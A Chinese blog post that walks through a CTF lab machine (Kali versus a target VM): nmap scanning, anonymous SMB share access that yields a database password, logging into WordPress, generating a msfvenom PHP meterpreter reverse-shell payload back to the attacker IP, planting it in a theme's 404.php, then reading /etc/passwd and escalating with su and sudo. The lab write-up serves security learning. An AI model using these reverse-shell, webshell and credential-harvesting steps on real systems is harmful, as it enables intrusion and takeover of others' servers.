CTF-SMB信息泄露【简单易懂】
前言
作者简介:不知名白帽,网络安全学习者。
博客主页:https://blog.csdn.net/m0_63127854?type=blog
CTF-专栏:https://blog.csdn.net/m0_63127854/category_11835386.html
网络安全交流社区:https://bbs.csdn.net/forums/angluoanquan
目录
SMB介绍
实验环境
信息探测
分析探测结果
针对SMB协议弱点分析
1.针对SMB协议,使用空口令,若口令尝试登陆,并查看敏感文件,下载查看;
2.针对SMB协议远程溢出漏洞进行分析
针对http协议弱点分析
1.浏览器查看网站
2.使用dirb nikto探测
3.寻找突破点,目标登录后台,上传webshell
4.优化终端
5.查找用户名:cat /etc/passwd
6.查找密码:在共享目录下的敏感文件,提升权限
SMB介绍
SMB协议是基于TCP-NETBIOS下的,一般端口使用为139,445
SMB协议,计算机可以访问网络资源,下载对应的资源文件
实验环境
kali 192.168.20.128
靶机 192.168.20.129
链接:https://pan.baidu.com/s/1inGR9A628icBnqcsHCnPYQ
提取码:4c5l
信息探测
nmap -sV ip 挖掘开放服务信息
nmap -A -v -T4 挖掘靶场全部信息
nmap -sV 192.168.20.129
分析探测结果
每一个服务对应计算机的一个端口,用来进行通信。常用端口0-1023端口,在扫描结果中查找特殊端口
针对特殊端口进行探测,尤其对开发大端口的http服务进行排查
针对SMB协议弱点分析
1.针对SMB协议,使用空口令,若口令尝试登陆,并查看敏感文件,下载查看;
smbclient -L ip
smbclient '\\ip\share$'
print$和IPC$没有什么利用价值
get 敏感文件
发现疑似数据库密码的数据(Admin;togieMYSQL12345^^)
远程登录3306端口不行
远程登录22端口不行
2.针对SMB协议远程溢出漏洞进行分析
searchsploit samba版本号
发现没有远程溢出漏洞
针对http协议弱点分析
1.浏览器查看网站
2.使用dirb nikto探测
打开查看
利用密码登录
登陆网站
3.寻找突破点,目标登录后台,上传webshell
制作webshell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.20.128 lport=4444 -f raw
制作webshell.php
启动监听
上传webshell
update file
获取反弹shell
选择twentyfifteen的原因
http://192.168.20.129/wordpress/wp-content/themes/twentyfifteen/404.php
4.优化终端
python -c "import pty;pty.spawn('/bin/bash')"
5.查找用户名:cat /etc/passwd
6.查找密码:在共享目录下的敏感文件,提升权限
su 用户名
12345是之前deets.txt文件里的密码
sudo-l
sudo su
查看flag.txt(根目录下没找到flag.txt,所以查看proof.txt)
CTF-SMB信息泄露【简单易懂】相关推荐
- Microsoft Windows SMB信息泄露漏洞
受影响系统: Microsoft Windows Server 20H2 (Server Core Insta Microsoft Windows Server 2022 (Server Core i ...
- CTF基础知识与web信息泄露下的目录遍历、PHPINFO、备份文件下载
文章目录 CTF基础知识 一.CTF简介 二.竞赛模式 三.比赛形式 四.题目类型 web信息泄露 一.目录遍历 二.PHPINFO 三.备份文件下载 (一)网站源码 (二)bak文件 (三)Vim缓 ...
- Python 爬取网页信息并保存到本地爬虫爬取网页第一步【简单易懂,注释超级全,代码可以直接运行】
Python 爬取网页信息并保存到本地[简单易懂,代码可以直接运行] 功能:给出一个关键词,根据关键词爬取程序,这是爬虫爬取网页的第一步 步骤: 1.确定url 2.确定请求头 3.发送请求 4.写入 ...
- CTF学习(二)——信息泄露、密码口令、SQL注入、文件上传
一.信息泄露 1.1目录遍历 ①点开题目后依次点开各目录,遍历后发现flag文件得旗 1.2 PHPINFO ①在长篇文件中查找flag得旗 1.3备份文件下载 1.3.1 网站源码 ①由提示下载文件 ...
- 身份证信息泄露的危险,你知道吗?简单一招就能查询
我们的微信号根据网络的实名制的要求都做了实名认证,可是我们的身份证会不会被别人偷偷绑定微信号呢?其实只要简单一招,就能够查看我们的身份证是否安全. 现在身份证信息泄露的危险层出不穷,我们的信息是否安 ...
- 【转】JS回调函数--简单易懂有实例
JS回调函数--简单易懂有实例 初学js的时候,被回调函数搞得很晕,现在回过头来总结一下什么是回调函数. 我们先来看看回调的英文定义:A callback is a function that is ...
- 【漏洞实战】从信息泄露到内网滲透
前言 能完成这次渗透纯属是信息收集做到位了.很多其实都是分散的信息,在某一次关键点集合起来就有可能拿到权限.这个漏洞已提交补天并修复完成了. 信息收集 一.发现敏感信息 此次使用的方法: Google ...
- 在50亿信息泄露事件面前,Struts 2 漏洞和CIA泄密都是小事 | 宅客周刊
1.一份数据告诉你,被万年漏洞王 Struts2 坑了的网站有哪些 pache Struts2 作为世界上最流行的 Java Web 服务器框架之一,3 月 7 日带来了本年度第一个高危漏洞--CVE ...
- fastjson反序列化漏洞_漏洞预警Fastjson再爆反序列化代码执行漏洞;星巴克被发现存在信息泄露风险...
漏洞预警 Fastjson再次爆出通杀的反序列化代码执行漏洞 漏洞信息 据态势感知平台监测,网络上再次出现此前未曾发现的fastjson反序列化攻击向量. Fastjson是由阿里巴巴推出基于Java ...
- alxc tool 报错数组超出了界限_代码审计之报错信息泄露与字符串截断
机器在语言编码转换的时候,经常会出现各种各样的异常,这些神奇的字符串就有可能组合成一堆乱码出来,也有可能直接把程序搞崩溃掉,不过总有那么一些字符,可以帮助我们在利用漏洞的时候变得更简单一些,下面我们就 ...
最新文章
- 20165219王彦博《基于Cortex-M4的虚拟机制作与测试》课程设计个人报告
- OpenAI 发布通用人工智能研究纲领:以全人类的名义承诺
- python对象编程例子-python(十二)面向对象编程、类
- 【Java面试题视频讲解】字符串按指定长度分隔
- 一口气放出三篇SIGIR论文!详解阿里妈妈搜索广告CTR模型演进
- EntityFramework Core表名原理解析,让我来,揭开你神秘的面纱
- Chrome调试WebView时Inspect出现空白的解决方法(使用离线包不Fan墙)
- 实例变量和局部变量区别
- 怪盗基德的滑翔翼(信息学奥赛一本通-T286)
- 帝国理工学院暑期学校 | 大数据与创新主题,郭院士领衔,全球Top10校级证书...
- tortoisegit中文_tortoiseGit实用教程
- windows 系统文件 —— 特殊文件及文件类型
- ubuntu16.04安装python3.6-dev超时_vitrualBox+ubuntu16.04安装python3.6最新教程及详细步骤...
- Java基础知识点复习知识点(一)变量,流程控制,数组
- 如何选择条形码识别SDK
- 三维全景虚拟现实:现在的VR全景行业怎么样?|时空克隆 三维视频融合 投影融合 点卯 魔镜系列
- C#,对接钉钉OA审批流程
- 真机测试无法验证应用
- matlab获取等高线的坐标,[matlab数据拟合曲线]matlab获取等高线的数据
- 百度成立智能驾驶事业群组 陆奇亲任总经理